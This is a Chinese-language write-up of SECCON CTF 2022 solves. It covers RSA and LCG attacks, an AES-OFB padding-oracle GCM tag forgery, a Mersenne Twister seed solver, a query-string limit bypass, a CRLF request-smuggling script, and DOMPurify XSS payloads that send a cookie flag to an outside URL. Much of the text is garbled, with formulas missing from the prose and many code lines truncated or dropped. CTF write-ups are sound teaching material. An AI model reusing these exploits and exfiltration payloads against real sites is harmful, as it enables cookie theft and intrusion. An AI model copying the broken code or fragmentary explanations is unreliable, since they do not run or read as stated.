SECCON CTF 2022 Writeups
這次在 TSJ (實質 solo QQ) 解了些的題目,一樣有學到些東西所以也簡單紀錄一下做法。
from Crypto.Util.number import *
from Crypto.Random import *
from flag import flag
p = getPrime(512)
q = getPrime(512)
r = getPrime(512)
n = p * q * r
e = 2 * 65537
assert n.bit_length() // 8 - len(flag) > 0
padding = get_random_bytes(n.bit_length() // 8 - len(flag))
m = bytes_to_long(padding + flag)
assert m < n
c1p = pow(p, e, n)
c1q = pow(q, e, n)
cm = pow(m, e, n)
c1 = (c1p - c1q) % n
c2 = pow(p - q, e, n)
print(f"e = {e}")
print(f"n = {n}")
# p^e - q^e mod n
print(f"c1 = {c1}")
# (p-q)^e mod n
print(f"c2 = {c2}")
# m^e mod n
print(f"cm = {cm}")
所以有 和 ,就完全分解 了。
再來是因為 ,由於有 的存在導致它不能直接 invert,但還是能求出 的值。之後就分別對 算 sqrt 後 crt 回來即可。
from math import gcd
from Crypto.Util.number import long_to_bytes
e = 131074
n = 587926815910957928506680558951380405698765957736660571041732511939308424899531125274073420353104933723578377320050609109973567093301465914201779673281463229043539776071848986139657349676692718889679333084650490543298408820393827884588301690661795023628407437321580294262453190086595632660415087049509707898690300735866307908684649384093580089579066927072306239235691848372795522705863097316041992762430583002647242874432616919707048872023450089003861892443175057
c1 = 92883677608593259107779614675340187389627152895287502713709168556367680044547229499881430201334665342299031232736527233576918819872441595012586353493994687554993850861284698771856524058389658082754805340430113793873484033099148690745409478343585721548477862484321261504696340989152768048722100452380071775092776100545951118812510485258151625980480449364841902275382168289834835592610827304151460005023283820809211181376463308232832041617730995269229706500778999
c2 = 46236476834113109832988500718245623668321130659753618396968458085371710919173095425312826538494027621684566936459628333712619089451210986870323342712049966508077935506288610960911880157875515961210931283604254773154117519276154872411593688579702575956948337592659599321668773003355325067112181265438366718228446448254354388848428310614023369655106639341893255469632846938342940907002778575355566044700049191772800859575284398246115317686284789740336401764665472
cm = 357982930129036534232652210898740711702843117900101310390536835935714799577440705618646343456679847613022604725158389766496649223820165598357113877892553200702943562674928769780834623569501835458020870291541041964954580145140283927441757571859062193670500697241155641475887438532923910772758985332976303801843564388289302751743334888885607686066607804176327367188812325636165858751339661015759861175537925741744142766298156196248822715533235458083173713289585866
# c1 = p^e - q^e mod pq
# c2 = p^e + q^e mod pq
# c1 + c2 = 2p^e mod pq
p = gcd(c1 + c2, n)
q = gcd(c1 - c2, n)
r = n // (p * q)
d = pow(e // 2, -1, (p - 1) * (q - 1) * (r - 1))
m2 = pow(cm, d, n)
for mp in GF(p)(m2).sqrt(all=True):
for mq in GF(q)(m2).sqrt(all=True):
for mr in GF(r)(m2).sqrt(all=True):
m = crt([ZZ(mp), ZZ(mq), ZZ(mr)], [p, q, r])
# SECCON{being_able_to_s0lve_this_1s_great!}
from Crypto.Util.number import bytes_to_long, getPrime
from random import randint
from math import gcd
from secret import FLAG
from os import urandom
assert len(FLAG) < 100
def generate_key(rng, seed):
e = rng(seed)
while True:
for _ in range(randint(10,100)):
e = rng(e)
p = getPrime(1024)
q = getPrime(1024)
phi = (p-1)*(q-1)
if gcd(e, phi) == 1:
n = p*q
return (n, e)
def generate_params():
p = getPrime(1024)
a = randint(0, p-1)
return (p,a)
def main():
p,a = generate_params()
print("[+] The parameters of RNG:")
b = int(input("[+] Inject [b]ackdoor!!: "))
rng = lambda x: (x**2 + a*x + b) % p
keys = []
seeds = []
for i in range(5):
seed = int(input("[+] Please input seed: "))
seed %= p
if seed in seeds:
print("[!] Same seeds are not allowed!!")
n, e = generate_key(rng, seed)
if e <= 10:
print("[!] `e` is so small!!")
flag = bytes_to_long(FLAG + urandom(16))
for n,e in keys:
c = pow(flag, e, n)
print("[+] Public Key:")
print("[+] Cipher Text:", c)
if __name__ == "__main__":
可以注意到 flag 最多 116 bytes,而 最小只能是 ,而 ,因此可知是要用 hastad broadcast attack。
要達成 hastad broadcast attack 需要讓五次的 才行,所以需要對 rng 動些手腳才行。首先從 generate_key
裡面的迴圈數量又不定讓我想到找不動點 ,但是由於它不允許重複使用 seed
,所以我想找 的值,且 ,這部分用 sage 很好達成。
找到之後可以用 當作 seed 傳送過去,運氣好只要迴圈次數都對的話最後出來的 就能解掉這題了。
然而這題有個問題在於它 remote 在 generate_key
的時候很花時間,再來前面的運氣好實際上也只有 的機率,所以要找方法改善這個方法。
我注意到它還會 check gcd(e, phi) == 1
,所以只要 是偶數的話肯定不會 return,因此只要讓 裡面只有 是奇數,其他都是偶數就能成了。
這樣成功的把 bruteforce 的時間縮短點,然後之後就多試幾次就行了。
from pwn import process, remote
from Crypto.Util.number import long_to_bytes
# io = process(["python", ""])
io = remote("", 8080)
a = int(io.recvline().strip())
p = int(io.recvline().strip())
F = GF(p)
E = 11
P.<x, b> = F[]
f = x ^ 2 + a * x + b
bs = (
(f(f(f(f(f, b), b), b), b)(E, b) - E)
for b in bs:
print("=" * 40)
P.<x> = F[]
f = x ^ 2 + a * x + b
isgood = False
v = E
seeds = set()
for i in range(10):
print(i, v)
v = f(v)
if v != E:
# we don't want all same value
isgood = True
if isgood:
print(f"{b = }")
print(f"{seeds = }")
if len(seeds) != 5 or not all([s % 2 == 0 for s in set(seeds) - {E}]):
print("bad seeds :(")
io.recvuntil(b"!!: ")
for seed in seeds:
io.recvuntil(b"seed: ")
ns = []
cs = []
for _ in range(5):
io.recvuntil(b"Public Key:")
n = int(io.recvline().strip())
e = int(io.recvline().strip())
io.recvuntil(b"Cipher Text: ")
c = int(io.recvline().strip())
print(f"{n = }")
print(f"{e = }")
print(f"{c = }")
if e != E:
print("bad e :(", _)
print(f"{ns = }")
print(f"{cs = }")
c = crt(cs, ns)
print(f"{c = }")
m = c.nth_root(E)
# for i in $(seq 1 16); do python -u > out/out$i.txt &; done
# SECCON{Can_you_find_d_in_bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbdbbbbbbbbbbbbbbbbbbbbbbbbbbbbb?}
其實這邊還有個比較好的方法,不用像我這樣 bruteforce,就是先讓 ,然後再找 ,之後再找 以此類推,因為它迴圈的次數都 10 次以上,這個方法可以保證最後的結果都是 。參考 4yn 的 writeup。
from Crypto.Util.number import *
from flag import flag
p = getStrongPrime(512)
q = getStrongPrime(512)
e = 65537
n = p * q
phi = (p - 1) * (q - 1)
d = pow(e, -1, phi)
print(f"n = {n}")
print(f"e = {e}")
print(f"flag_length = {flag.bit_length()}")
# Oops! encrypt without padding!
c = pow(flag, e, n)
print(f"c = {c}")
# padding format: 0b0011111111........
def check_padding(c):
padding_pos = n.bit_length() - 2
m = pow(c, d, n)
return (m >> (padding_pos - 8)) == 0xFF
while True:
c = int(input("c = "))
看到這題的第一眼我想到的是 rsa interval oracle iv,所以直接套用相同的 LLL 方法就解掉了。
from pwn import process, remote
import random
import gmpy2
def pow(a, b, c):
return int(gmpy2.powmod(a, b, c))
# io = process(["python", ""])
io = remote("", 8080)
io.recvuntil(b"n = ")
n = int(io.recvline())
io.recvuntil(b"e = ")
e = int(io.recvline())
io.recvuntil(b"flag_length = ")
flag_length = int(io.recvline())
io.recvuntil(b"c = ")
c = int(io.recvline())
# def oracle(c):
# io.sendlineafter(b'c = ', str(c).encode())
# return io.recvline().strip() == b'True'
k = n.bit_length() - 2 - 8
L = 0xFF << k
R = L + (1 << k) - 1
B = 1 << flag_length
def batch_oracle(cc):
io.sendline("\n".join(map(str, cc)).encode())
res = []
for _ in range(len(cc)):
io.recvuntil(b"c = ")
res.append(io.recvline().strip() == b"True")
return res
good = []
while len(good) < flag_length // 10 + 15:
aa = [random.randrange(1, n) for _ in range(2048)]
cc = [pow(a, e, n) * c % n for a in aa]
res = batch_oracle(cc)
good += [a for a, r in zip(aa, res) if r]
print("cur", len(good))
M = matrix(good).stack(matrix.identity(len(good)) * n)
M = matrix([1] + len(good) * [0]).T.augment(M)
_, _, fin = solve(M, [0] + [L] * len(good), [B] + [R] * len(good))
# 923527005889600515717927945977637659146494233475843599679540322066522531810019204383510355169667412726034587411782045475101164773757
# SECCON{WeLC0me_t0_tHe_MirRoR_LaNd!_tHIs_is_lSb_orAcLe!}
不過這很明顯非 intended,預期做法是單純的 binary search 而已 XD。就 ,然後對 去搜而已。
from random import randint
from Crypto.Util.number import getPrime, bytes_to_long
from secret import FLAG
# f(x,y,z) = a1*x + a2*x^2 + a3*x^3
# + b1*y + b2*y^2 + b3*y^3
# + c*z + s mod p
def calc_f(coeffs, x, y, z, p):
ret = 0
ret += x * coeffs[0] + pow(x, 2, p) * coeffs[1] + pow(x, 3, p)*coeffs[2]
ret += y * coeffs[3] + pow(y, 2, p) * coeffs[4] + pow(y, 3, p)*coeffs[5]
ret += z * coeffs[6]
ret += coeffs[7]
return ret % p
p = getPrime(512)
# [a1, a2, a3, b1, b2, b3, c, s]
coeffs = [randint(0, 2**128) for _ in range(8)]
key = 0
for coeff in coeffs:
key <<= 128
key ^= coeff
cipher_text = bytes_to_long(FLAG) ^ key
shares = []
for _ in range(4):
x = randint(0, p)
y = randint(0, p)
z = randint(0, 2**128)
w = calc_f(coeffs, x, y, z, p)
packed_share = ((x,y), w)
這題有個 trivariate 的函數 ,一共有 8 個未知數。再來它給你四個點的值 和 。 (注意,這邊沒有給 )
方法也很明顯,就是它的未知數和 座標的值都只有 128 bits,而 卻是 bits 的,所以大概是和 LLL 有關的。
反正先把所有的 coeffs
和 z
當未知數列,一共會得到四個等式,然後把 2 terms 的 monomial (如 , ) 一樣當作一個獨立的 term 來看到就能得到一個 underdetermined linear system。
然後之後一樣套 CVP solver 會得到一些解,在 local 測試會發現 的值都是正確的,但是 等的值都是錯的。
自己測試一下會發現算出來錯誤的 實際上和真實的值相差不遠,有以下的關係:
有加 指的是錯誤的值
所以相減後 gcd 就能拿到正確的 ,之後猜一下 的正負就能得到 ,然後就能算出 把整個 flag 還原了。
後來我想了一想出現這個問題的地方其實是和它那個函數 有關,因為
注意一下 都是未知數,也就是它們都屬於常數項,所以自然 和 會有那些 的關係在。
from sage.all import *
from random import randint
from Crypto.Util.number import getPrime, bytes_to_long, long_to_bytes
from itertools import product
from functools import reduce
with open("output.txt") as f:
cipher_text = eval(f.readline())
p = eval(f.readline())
shares = eval(f.readline())
F = GF(p)
P = PolynomialRing(F, "a1,a2,a3,b1,b2,b3,c,s,z1,z2,z3,z4")
a1, a2, a3, b1, b2, b3, c, s, *zs = P.gens()
nvars = len(P.gens())
eqs = []
for ((x, y), w), z in zip(shares, zs):
ww = (
a1 * x
+ a2 * x**2
+ a3 * x**3
+ b1 * y
+ b2 * y**2
+ b3 * y**3
+ c * z
+ s
eqs.append(ww - w)
M, v = Sequence(eqs).coefficient_matrix()
v = vector(v)[:-1]
M = M.dense_matrix().T.change_ring(ZZ)
target = -M[-1]
M = M[:-1]
nr, nc = M.dimensions()
print(nr, nc)
IP = matrix.identity(nc) * p
I = matrix.identity(nr)
Z =, nr)
B = block_matrix(ZZ, [[M, I], [IP, Z]])
lb = list(target) + [0] * nr
ub = list(target) + [ZZ(mono((2**128,) * nvars)) for mono in v]
result, applied_weights, fin = solve(B, lb, ub)
res = [x // y for x, y in zip(result, applied_weights)]
cz1, cz2, cz3, cz4, a1, a2, a3, b1, b2, b3, s = res[nc:]
# a1,a2,a3,b1,b2,b3 are correct here
# but cz1,cz2,cz3,cz4,s are not...
# it seems cz1 is actually c*z1+k
# and cz2 is actually c*z2+k
# and s is actuall s-k
czs = [cz1, cz2, cz3, cz4]
diffs = [x - y for x, y in product(czs, repeat=2)]
c = reduce(gcd, diffs)
z1, z2, z3, z4 = [x // c + 1 for x in czs]
k = cz1 - c * z1
assert k == cz2 - c * z2
s += k
roots = [a1, a2, a3, b1, b2, b3, c, s, z1, z2, z3, z4]
for eq in eqs:
assert eq(*roots) == 0
key = 0
for coeff in [a1, a2, a3, b1, b2, b3, c, s]:
key <<= 128
key ^= coeff
flag = long_to_bytes(cipher_text ^ key)
# SECCON{Unfortunately_I_could_not_come_up_with_a_more_difficult_problem_than_last_year_sorry...-6fc18307d3ed2e7673a249abc2e0e22c}
from Crypto.Cipher import AES
from Crypto.Random import get_random_bytes
from Crypto.Util.Padding import pad, unpad
from flag import flag, secret_spell
key = get_random_bytes(16)
nonce = get_random_bytes(16)
def encrypt():
data = secret_spell
gcm_cipher =, AES.MODE_GCM, nonce=nonce)
gcm_ciphertext, gcm_tag = gcm_cipher.encrypt_and_digest(data)
ofb_input = pad(gcm_tag + gcm_cipher.nonce + gcm_ciphertext, 16)
ofb_iv = get_random_bytes(16)
ofb_cipher =, AES.MODE_OFB, iv=ofb_iv)
ciphertext = ofb_cipher.encrypt(ofb_input)
return ofb_iv + ciphertext
def decrypt(data):
ofb_iv = data[:16]
ofb_ciphertext = data[16:]
ofb_cipher =, AES.MODE_OFB, iv=ofb_iv)
m = ofb_cipher.decrypt(ofb_ciphertext)
temp = unpad(m, 16)
return b"ofb error"
gcm_tag = temp[:16]
gcm_nonce = temp[16:32]
gcm_ciphertext = temp[32:]
gcm_cipher =, AES.MODE_GCM, nonce=gcm_nonce)
plaintext = gcm_cipher.decrypt_and_verify(gcm_ciphertext, gcm_tag)
return b"gcm error"
if b"give me key" == plaintext:
your_spell = input("ok, please say secret spell:").encode()
if your_spell == secret_spell:
return flag
return b"Try Harder"
return b"ok"
print(f"ciphertext: {encrypt().hex()}")
while True:
c = input("ciphertext: ")
這題關鍵在於它有 AES-OFB 的 padding oracle,由於 OFB 的 encrypt 和 decrypt 是相同的,可以利用 oracle 來達成任意 plaintext 的加密,也就是能寫出一個 函數。有 之後要解密 OFB 很簡單,因為它就只是個 xor 而已。
而 GCM 的部分在有 之後也是很簡單,因為 Auth Key 就是用 生成的 (),所以我們有辦法對任何 ciphertext 去 forge auth tag,然後也就能控制解密出的 plaintext 的內容。
用 padding oracle 實作 和 CBC padding oracle 很類似,實作上真正困難的是怎麼利用一個 函數去模擬 GCM 的所有操作。我這邊是透過去讀 pycryptodome 的內部實作,然後自己 monkeypatch 掉一些會用到的部分之後就能用 模擬 GCM 了。
from pwn import process, remote
import ast
from Crypto.Cipher import AES
from Crypto.Random import get_random_bytes
from Crypto.Util.Padding import pad, unpad
from Crypto.Cipher._mode_gcm import _GHASH, _ghash_portable as ghash_c
from Crypto.Util.number import *
# io = process(["python", ""])
io = remote("", 8080)
io.recvuntil(b"ciphertext: ")
ciphertext = bytes.fromhex(io.recvline().decode().strip())
def decrypt(ct, ret=True):
io.sendlineafter(b"ciphertext: ", ct.hex().encode())
if ret:
return ast.literal_eval(io.recvline().strip().decode())
def batch_decrypt(cts):
io.sendline("\n".join(map(bytes.hex, cts)).encode())
res = []
for _ in range(len(cts)):
io.recvuntil(b"ciphertext: ")
r = ast.literal_eval(io.recvline().strip().decode())
return res
def xor(a, b):
return bytes([x ^ y for x, y in zip(a, b)])
def ecb_enc(pt):
print("Encrypting", pt)
assert len(pt) == 16
result = b""
for i in range(16):
pad = i + 1
ct = bytearray([0] * 16)
for j in range(256):
ct[:i] = [pad ^ x for k, x in enumerate(result)]
ct[i] = j
if decrypt(pt + ct[::-1]) != b"ofb error":
result += bytes([j ^ pad])
raise Exception(f"Padding oracle failed")
return result[::-1]
def ecb_enc(pt):
# optimized for remote using batch decryption oracle
print("Encrypting", pt)
assert len(pt) == 16
result = b""
for i in range(16):
pad = i + 1
cts = []
ct = bytearray([0] * 16)
for j in range(256):
ct[:i] = [pad ^ x for k, x in enumerate(result)]
ct[i] = j
res = batch_decrypt([pt + ct[::-1] for ct in cts])
for j, r in enumerate(res):
if r != b"ofb error":
result += bytes([j ^ pad])
return result[::-1]
def ofb_decrypt(iv, ct):
pt = b""
for i in range(0, len(ct), 16):
iv = ecb_enc(iv)
pt += xor(iv, ct[i : i + 16])
return pt
ofb_iv = ciphertext[:16]
ofb_ciphertext = ciphertext[16:]
ofb_input = ofb_decrypt(ofb_iv, ofb_ciphertext)
ofb_stream = xor(ofb_input, ofb_ciphertext)
def gcm_oracle(inp):
inp = pad(inp, 16)
assert len(inp) <= len(ofb_stream)
return decrypt(ofb_iv + xor(ofb_stream, inp), ret=False)
gcm_concat = unpad(ofb_input, 16)
gcm_tag = gcm_concat[:16]
gcm_nonce = gcm_concat[16:32]
gcm_ciphertext = gcm_concat[32:]
class FakeCTR:
def __init__(self, ecb_enc, initial_value, nonce):
if isinstance(initial_value, bytes):
initial_value = int.from_bytes(initial_value, "big")
self.ecb_enc = ecb_enc
self.initial_value = initial_value
self.nonce = nonce
self.ctr = (int.from_bytes(nonce, "big") << 32) | initial_value
def encrypt(self, pt, output=None):
ct = b""
for i in range(0, len(pt), 16):
ct += xor(self.ecb_enc(self.ctr.to_bytes(16, "big")), pt[i : i + 16])
self.ctr += 1
return ct
class FakeGCM:
def __init__(self, ecb_enc, nonce):
self.ecb_enc = ecb_enc
self.nonce = nonce
self.hash_subkey = ecb_enc(b"\x00" * 16)
fill = (16 - (len(nonce) % 16)) % 16 + 8
ghash_in = nonce + b"\x00" * fill + long_to_bytes(8 * len(nonce), 8)
self.j0 = _GHASH(self.hash_subkey, ghash_c).update(ghash_in).digest()
self.nonce_ctr = self.j0[:12]
self.iv_ctr = (bytes_to_long(self.j0) + 1) & 0xFFFFFFFF
def encrypt(self, msg):
cip ="\x00" * 16, AES.MODE_GCM, nonce=gcm_nonce)
cip._cipher = FakeCTR(ecb_enc, self.iv_ctr, self.nonce_ctr)
cip._tag_cipher = FakeCTR(ecb_enc, self.j0, b"")
cip._signer = _GHASH(self.hash_subkey, ghash_c)
return cip.encrypt_and_digest(msg)
gcm = FakeGCM(ecb_enc, gcm_nonce)
ctr = FakeCTR(ecb_enc, gcm.iv_ctr, gcm.nonce_ctr)
secret_spell = xor(ctr.encrypt(b"\x00" * len(gcm_ciphertext)), gcm_ciphertext)
ct, tag = gcm.encrypt(b"give me key")
gcm_oracle(tag + gcm_nonce + ct)
io.sendlineafter(b"spell:", secret_spell)
# SECCON{you_solved_this!?I_g1ve_y0u_symmetr1c_cipher_mage_certificate}
如果要找 GCM 完全都自己處理的版本的話可以參考 rkm0959 的 solve script。
janken vs kurenaif
import os
import signal
import random
import secrets
FLAG = os.getenv("FLAG", "fake{cast a special spell}")
def janken(a, b):
return (a - b + 3) % 3
print("kurenaif: Hi, I'm a crypto witch. Let's a spell battle with me.")
witch_spell = secrets.token_hex(16)
witch_rand = random.Random()
witch_rand.seed(int(witch_spell, 16))
print(f"kurenaif: My spell is {witch_spell}. What about your spell?")
your_spell = input("your spell: ")
your_random = random.Random()
your_random.seed(int(your_spell, 16))
for _ in range(666):
witch_hand = witch_rand.randint(0, 2)
your_hand = your_random.randint(0, 2)
if janken(your_hand, witch_hand) != 1:
print("kurenaif: Could you come here the day before yesterday?")
print("kurenaif: Amazing! Your spell is very powerful!!")
print(f"kurenaif: OK. The flag is here. {FLAG}")
這題單純要找到一個 Python 的 random object 可以產生出指定會勝利的 output 是很簡單,只要 z3 或是其他東西 solve 一下然後把 states 設定好就行了。然而困難的地方在於這題還要求那個 random object 是要可以用 seed 弄出來的,而不是每個 states 都有可能用一個 integer seed 生成的。
看一下 random_seed 的實作可以知道它會把 int 按 32 bits 切割,然後用 init_by_array
做一些很複雜的操作去把 state 初始化。
然後去查一下可以在 RNGeesus 的 找到有人用 z3 嘗試把 states 逆轉回 seed 成功,所以我把它結合 icemonster/symbolic_mersenne_cracker 在一起,讓 z3 去解也真的成功了。這個方法的唯一缺點是它需要花上十幾分鐘才能解出來,不過因為題目給的時間限制也是 1000 秒,大概代表這是 intended 吧。
from z3 import *
from pwn import process, remote, context
import signal
import random
from itertools import count
context.log_level = "debug"
# io = process(["python", ""])
io = remote("", 8080)
io.recvuntil(b"is ")
THE_SEED = int(io.recvuntil(b".")[:-1].decode(), 16)
def randbelow(r, n):
k = n.bit_length()
v = r.getrandbits(k)
while v >= n:
v = r.getrandbits(k)
return v
def janken(a, b):
return (a - b + 3) % 3
r1 = random.Random(THE_SEED)
vals = []
for _ in range(666):
b = r1.randint(0, 2)
a = (1 - 3 + b) % 3
assert janken(a, b) == 1
class Untwister:
def __init__(self):
self.ctr = count()
name = next(self.ctr)
self.init_MT = [BitVec(f"MT_{i}_{name}", 32) for i in range(624)]
self.MT = self.symbolic_twist(self.init_MT)
self.index = 0
self.solver = Solver()
self.subs = 0
# This particular method was adapted from
def symbolic_untamper(self, solver, y):
name = next(self.ctr)
y1 = BitVec(f"y1_{name}", 32)
y2 = BitVec(f"y2_{name}", 32)
y3 = BitVec(f"y3_{name}", 32)
y4 = BitVec(f"y4_{name}", 32)
equations = [
y2 == y1 ^ (LShR(y1, 11)),
y3 == y2 ^ ((y2 << 7) & 0x9D2C5680),
y4 == y3 ^ ((y3 << 15) & 0xEFC60000),
y == y4 ^ (LShR(y4, 18)),
return y1
def symbolic_twist(
This method models MT19937 function as a Z3 program
MT = [i for i in MT] # Just a shallow copy of the state
for i in range(n):
x = (MT[i] & upper_mask) + (MT[(i + 1) % n] & lower_mask)
xA = LShR(x, 1)
xB = If(
x & 1 == 0, xA, xA ^ a
) # Possible Z3 optimization here by declaring auxiliary symbolic variables
MT[i] = MT[(i + m) % n] ^ xB
return MT
def get_symbolic(self, guess):
name = next(self.ctr)
ERROR = 'Must pass a string like "?1100???1001000??0?100?10??10010" where ? represents an unknown bit'
assert type(guess) == str, ERROR
assert all(map(lambda x: x in "01?", guess)), ERROR
assert len(guess) <= 32, "One 32-bit number at a time please"
guess = guess.zfill(32)
self.symbolic_guess = BitVec(f"symbolic_guess_{name}", 32)
guess = guess[::-1]
for i, bit in enumerate(guess):
if bit != "?":
self.solver.add(Extract(i, i, self.symbolic_guess) == bit)
return self.symbolic_guess
def submit(self, guess):
You need 624 numbers to completely clone the state.
You can input less than that though and this will give you the best guess for the state
self.subs += 1
if self.index >= 624:
name = next(self.ctr)
next_mt = self.symbolic_twist(self.MT)
self.MT = [BitVec(f"MT_{i}_{name}", 32) for i in range(624)]
for i in range(624):
self.solver.add(self.MT[i] == next_mt[i])
self.index = 0
symbolic_guess = self.get_symbolic(guess)
symbolic_guess = self.symbolic_untamper(self.solver, symbolic_guess)
self.solver.add(self.MT[self.index] == symbolic_guess)
self.index += 1
def get_random(self, skip_states=True):
This will give you a random.Random() instance with the cloned state.
model = self.solver.model()
# Compute best guess for state
state = list(map(lambda x: model[x].as_long(), self.init_MT))
result_state = (3, tuple(state + [624]), None)
r = random.Random()
if skip_states:
for _ in range(self.subs):
return r
from RNGeesus.src.code_mersenne.mersenne import MT19937
num_seeds = 624
MT = [BitVecVal(i, 32) for i in MT19937(19650218).MT]
SEEDS = [BitVec(f"seed[{i}]", 32) for i in range(num_seeds)]
i, j = 1, 0
n = 624
for k in range(n):
MT[i] = (MT[i] ^ ((MT[i - 1] ^ LShR(MT[i - 1], 30)) * 1664525)) + SEEDS[j] + j
i += 1
j += 1
if i >= n:
MT[0] = MT[n - 1]
i = 1
if j == num_seeds:
j = 0
for k in range(n - 1):
MT[i] = (MT[i] ^ ((MT[i - 1] ^ LShR(MT[i - 1], 30)) * 1566083941)) - i
i += 1
if i >= n:
MT[0] = MT[n - 1]
i = 1
MT[0] = BitVecVal(0x80000000, 32)
r1 = random.Random(THE_SEED)
ut = Untwister()
for i in range(624):
ut.solver.add(ut.init_MT[i] == MT[i])
for v in vals:
ut.submit(f"{v:02b}" + "?" * 30)
r2 = ut.get_random(skip_states=False)
for v in vals:
assert janken(r2.randint(0, 2), r1.randint(0, 2)) == 1
m = ut.solver.model()
seeds = [m[s].as_long() for s in SEEDS]
def array_to_int(arr):
return int.from_bytes(
b"".join([int.to_bytes(i, 4, "little") for i in arr]), "little"
seed = array_to_int(seeds)
r1 = random.Random(THE_SEED)
r3 = random.Random(seed)
for v in vals:
assert janken(r3.randint(0, 2), r1.randint(0, 2)) == 1
後來讀了 y011d4 的 writeup,發現他的 solve script 只要約 20 秒就能解出來了…
看來我應該研究一下他的 z3 用法,或許能讓我的 script 更快一點
const app = require("express")();
const FLAG = process.env.FLAG ?? "SECCON{dummy}";
const PORT = 3000;
app.get("/", (req, res) => {
? res.status(400).send("Access here directly, not via nginx :(")
: res.send(`Congratz! You got a flag: ${FLAG}`);
app.listen({ port: PORT, host: "" }, () => {
console.log(`Server listening at ${PORT}`);
然後在這個 server 前有個 nginx 在:
server {
listen 8080 default_server;
server_name nginx;
location / {
set $args "${args}&proxy=nginx";
proxy_pass http://web:3000;
單從 set $args
那行我想不到什麼方法繞,所以就去研究 express.js 處理 query string 的 qs module 了。當它出現重複的 key 時預設會把它變成 array,所以 req.query.proxy.includes("nginx")
仍然會是 true,所以這樣是繞不過的。
後來去讀了它裡面的 code 發現有 parameterLimit 這個選項存在,而它會被用到 split()
的最大切分數量那邊,所以只要塞超過一些個 &
就會讓最後面的 &proxy=nginx
# SECCON{sometimes_deFault_options_are_useful_to_bypa55}
它有個明顯的 XSS 在,然而 flag 是放在 http-only cookie 裡面所以不能直接拿到。不過這提最有趣的地方是它有個自己弄的 http proxy:
def proxy(req) -> str:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("backend", 3000))
payload = ""
method = req.method
path = req.path_info
if req.query_string:
path += "?" + req.query_string
payload += f"{method} {path} HTTP/1.1\r\n"
for k, v in req.headers.items():
payload += f"{k}: {v}\r\n"
payload += "\r\n"
data = sock.recv(4096)
body = data.split(b"\r\n\r\n", 1)[1].decode()
except (IndexError, TimeoutError) as e:
body = str(e)
return body
測試了一下可以利用 req.path_info
包含 %0D%0A
等字元去 CRLF Injection,所以只要找方法用適當的劃分讓 Cookie 的部分想辦法讓 backend 回顯回來即可。
做一些測試後能發現 backend 會在遇到不正常的 http method 時直接把錯誤的 method name 回顯,所以透過 Content-Length
和 Connection: keep-alive
控制一下就能讓 flag 被當成 method name 回顯回來。
具體要讓 xss 執行的 script 如下:
;(async () => {
document.cookie = 'long=l000000000000000000000000000000g'
for (let i = 300; i < 500; i += 1) {
'/' +
' HTTP/1.0\r\nConnection: keep-alive\r\n\r\nPOST /x HTTP/1.0\r\nConnection: keep-alive\r\nContent-Length: ' +
i +
{ headers: { 'X-A': 'ASD' } }
.then(r => r.text())
.then(res => {
if (res.includes('SECCON'))
return fetch('' + i, {
body: res,
method: 'POST'
把它放在 的 response 中然後用 iframe + script 執行即可:
<iframe srcdoc="<script src=''></script>"></iframe>
一樣是 client side 的題目,關鍵的 code 如下:
trustedTypes.createPolicy('default', {
createHTML: unsafe => {
return DOMPurify.sanitize(unsafe).replace(/SECCON{.+}/g, () => {
// Delete a secret in RegExp
const get = path => {
return path.split('/').reduce((obj, key) => obj[key], document.all)
const init = async () => {
const emojis = await (await fetch('/api/emojis')).json()
const fragment = document.createDocumentFragment()
for (const emoji of emojis) {
const elm = document.createElement('p')
elm.innerHTML = emoji
get('piyo').innerHTML = '🐥/🐣/🐤'.split('/')[(Math.random() * 3) | 0]
const main = async () => {
const params = new URLSearchParams(
const message = `${params.get('message')}${document.cookie.split('FLAG=')[1] ?? 'SECCON{dummy}'}`
// Delete a secret in document.cookie
document.cookie = 'FLAG=; expires=Thu, 01 Jan 1970 00:00:00 GMT'
get('message').innerHTML = message
const emoji = get(params.get('emoji'))
get('message').innerHTML = get('message').innerHTML.replace(/{{emoji}}/g, emoji)
document.addEventListener('DOMContentLoaded', async () => {
await init()
await main()
雖然看起來 get('message').innerHTML = message
可以直接 xss,但因為它有弄 trusted types 的緣故還是要繞 DOMPurify。
繞法也很簡單,因為它會在 sanitize 後才把 SECCON{.*}
replace 掉,所以
SECCON{<p data-x="}<img src onerror='alert(1)'>">
就能繞過保護得到 XSS 了。
不過這題的難點顯然不在於此,因為原本在 document.cookie
中的 flag 消失已經被清除了,而 RegExp.input
和 RegExp.$_
也被作者用 ''.match(/^$/)
擋住了,所以需要找找有沒有什麼地方有殘留 flag。
仔細想想會發現 flag 會經過的函數除了那個 replace
以外就只有 DOMPurify.sanitize
,所以應該是不會有殘留的對吧…? 其實關鍵就在這邊,因為 DOMPurify 其實有個 DOMPurify.removed
的 array 會記錄下所有被移除掉的 elements,所以只要在 message
的尾端塞 <script>
,那包含 flag 的那個 <script>
就會被放到裡面去,然後存取 DOMPurify.removed[0].element.textContent
就能找回 flag 了。
不過後面要注意的一點是第二個 innerHTML
assignment 也會把 DOMPurify.removed
清空,所以要讓 const emoji = ...
那行 error 才能讓後面不執行。
SECCON{<p data-x="}<img src onerror='flag=DOMPurify.removed[0].element.textContent;(new Image).src=\`\`+flag'>">